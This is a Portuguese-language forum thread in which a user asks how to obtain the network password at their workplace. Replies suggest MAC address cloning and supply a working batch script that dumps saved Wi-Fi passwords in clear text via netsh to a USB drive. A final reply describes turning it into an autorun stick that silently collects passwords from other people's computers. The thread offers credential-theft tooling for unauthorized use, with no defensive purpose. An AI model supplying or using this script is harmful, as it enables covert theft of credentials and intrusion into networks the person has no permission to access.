Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Como conseguir senha da rede de internet.

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Dúvida Como conseguir senha da rede de internet.

    Na empresa em que trabalho há uma rede de computadores conectados entre si e notei que eles utilizam "roteadores" para distribuir os cabos de comunicação entre os setores...se fosse por wi-fi direto eu saberia como conseguir a senha mas como são cabos conectados direto no computador ,eu não sei como consegui-la então gostaria de saber se é possivel apenas tendo acesso a um dos computadores. espero que tenham entendido a pergunta
    aguardando resposta.
    Similar Threads

  • Font Size
    #2
    Postado Originalmente por Taibic Ver Post
    Na empresa em que trabalho há uma rede de computadores conectados entre si e notei que eles utilizam "roteadores" para distribuir os cabos de comunicação entre os setores...se fosse por wi-fi direto eu saberia como conseguir a senha mas como são cabos conectados direto no computador ,eu não sei como consegui-la então gostaria de saber se é possivel apenas tendo acesso a um dos computadores. espero que tenham entendido a pergunta
    aguardando resposta.
    Se os Roteadores forem com acesso Wifi vc possivelmente conseguira uma chance.

    Comment


    • Font Size
      #3
      Acredito que clonando seu MAC com um que tem acesso à rede cabeada permitirá que vc tbm tenha acesso.

      Comment


      • Font Size
        #4
        senhas local de rede

        crie um arquivo .bat e execute como administrador no seu pendrive
        para que ele crie o arquivo sss.txt no seu pendrive e não na maquina local
        com configurações da rede e senhas
        obs: ele so gera o relatorio de senha se executar como administrador
        para isso clica com o botao direito do mouse no arquivo .bat e clique em Executar como Administrador

        arquivo: doc.bat

        echo %date% %time%>>sss.txt
        echo %username%>>sss.txt
        echo - >>sss.txt
        netsh wlan show profile name=* key=clear >>sss.txt
        echo -------------------------------------------------------- >> sss.txt



        vc tb pode usar programas do site:

        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

        são simples mas eficientes e vc baixa direto sem frescura,
        sem aqueles programinhas de download que enche sua maquina de porcaria.

        Comment


        • Font Size
          #5
          Muito bom Nectardut. Obrigado. Montei um autorun aqui no pendrive, e quando eu espeto ele no computador/notebook de alguém as senhas são todas gravadas.

          OBS.: Nem precisa ser administrador para funfar.

          Comment

          X
          Working...
          X